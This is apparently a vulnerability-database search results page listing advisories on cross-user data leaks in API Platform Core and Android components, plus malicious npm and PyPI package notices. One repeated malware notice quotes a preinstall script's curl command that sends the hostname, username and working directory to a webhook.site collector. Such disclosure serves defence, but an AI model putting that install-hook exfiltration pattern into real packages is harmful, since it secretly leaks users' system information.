Lucene search
K

34 matches found

Cvelist
Cvelist
added 6 days ago33 views

CVE-2026-49858 API Platform Core: Cross-user attribute leak in JSON:API and HAL item normalizers due to missing isCacheKeySafe gate

API Platform Core is a system to create hypermedia-driven REST and GraphQL APIs. In versions from 2.6.0 prior to 4.1.29, 4.2.26, and 4.3.12, a missing isCacheKeySafe gate in the JSON:API and HAL item normalizers causes a cross-user attribute leak. ApiPropertysecurity: ... is evaluated per request...

5.9CVSS0.00197EPSS
Exploits0References1
CVE
CVE
added 6 days ago18 views

CVE-2026-49858

API Platform Core contains a cross-user attribute leak in JSON:API and HAL item normalizers due to a missing isCacheKeySafe gate. Affected versions: 2.6.0 up to 4.1.28, 4.2.25, and 4.3.11 (i.e., before 4.1.29, 4.2.26, 4.3.12). Root cause: componentsCache arrays are keyed on $context['cache_key'] ...

5.9CVSS5.7AI score0.00197EPSS
Exploits0References1
OSV
OSV
added 2026/06/15 8:8 p.m.5 views

MAL-2026-5826 Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 8:8 p.m.9 views

Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 2:39 p.m.13 views

Malicious code in pywingui (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db77876bf3b13e55750748761841f7ab77f17bd951bdc1c749e1e56d4416d7e pywingui 6.0.1 advertises itself as a Win32 UI automation framework but ships only Nuitka-compiled cp311-win32.pyd binaries the 4.py files are trivia...

5.8AI score
Exploits0References5
Tenable Nessus
Tenable Nessus
added 2026/05/06 12:0 a.m.9 views

Linux Distros Unpatched Vulnerability : CVE-2026-43089

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - xfrmuser: fix info leak in buildmapping struct xfrmusersaid has a one-byte padding hole after the proto field, which ends up never getting set to zero before...

5.5CVSS6AI score0.00123EPSS
Exploits0References3
RedhatCVE
RedhatCVE
added 2026/01/09 11:16 a.m.8 views

CVE-2021-0979

In isRequestPinItemSupported of ShortcutService.java, there is a possible cross-user leak of packages in which the default launcher supports requests to create pinned shortcuts due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges...

5.5CVSS6.2AI score0.00105EPSS
Exploits0References1
EUVD
EUVD
added 2025/12/08 6:30 p.m.5 views

EUVD-2025-201741

In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...

7.8CVSS6.3AI score0.00072EPSS
Exploits0References3
Vulnrichment
Vulnrichment
added 2025/12/08 4:57 p.m.2 views

CVE-2025-48628

In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...

6.4AI score0.00072EPSS
Exploits0References2
OSV
OSV
added 2025/12/01 12:0 a.m.6 views

ASB-A-376462130

In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...

7.8CVSS6.8AI score0.00072EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2025/10/23 12:0 a.m.3 views

PT-2025-43501

Name of the Vulnerable Software and Affected Versions Android affected versions not specified Description A flaw exists in the Framework component of Android operating systems related to insufficient protection of sensitive data. Exploitation may allow an attacker to disclose protected informatio...

7.8CVSS6.2AI score0.00072EPSS
Exploits0References8
EUVD
EUVD
added 2025/10/07 12:30 a.m.7 views

EUVD-2021-17092

Malware in sbrugna...

4.3CVSS4.5AI score0.01175EPSS
Exploits1References5
EUVD
EUVD
added 2025/10/07 12:30 a.m.3 views

EUVD-2020-30692

Malware in sbrugna...

5.5CVSS6.3AI score0.00308EPSS
Exploits0References2
EUVD
EUVD
added 2025/10/03 8:7 p.m.6 views

EUVD-2025-27042

Malicious code in bioql PyPI...

5.5CVSS6.4AI score0.00084EPSS
Exploits0References2
EUVD
EUVD
added 2025/10/03 8:7 p.m.4 views

EUVD-2021-3598

Malicious code in bioql PyPI...

5.5CVSS5.7AI score0.00105EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2025/09/06 7:31 p.m.4 views

CVE-2025-48529

In setRingtoneUri of VoicemailNotificationSettingsUtil.java , there is a possible cross user data leak due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...

5.5CVSS5.5AI score0.0008EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2025/09/06 5:21 p.m.4 views

CVE-2025-26453

In isContentUriForOtherUser of BluetoothOppSendFileInfo.java, there is a possible cross user data leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...

5.5CVSS5.5AI score0.00084EPSS
Exploits0References1
CVE
CVE
added 2025/09/04 6:34 p.m.34 views

CVE-2025-48529

The CVE-2025-48529 issue affects VoicemailNotificationSettingsUtil.java, specifically the setRingtoneUri function, causing a cross-user data leak (confused deputy) that can disclose local information without extra privileges. Exploitation requires no user interaction and is local. The connected d...

5.5CVSS5AI score0.0008EPSS
Exploits0References2Affected Software1
OSV
OSV
added 2025/09/04 6:15 p.m.5 views

CVE-2025-26424

In multiple functions of VpnManager.java, there is a possible cross-user data leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...

4CVSS5.9AI score0.00092EPSS
Exploits0References2
Cvelist
Cvelist
added 2025/09/04 5:15 p.m.5 views

CVE-2025-26453

In isContentUriForOtherUser of BluetoothOppSendFileInfo.java, there is a possible cross user data leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...

0.00084EPSS
Exploits0References2
Rows per page
Query Builder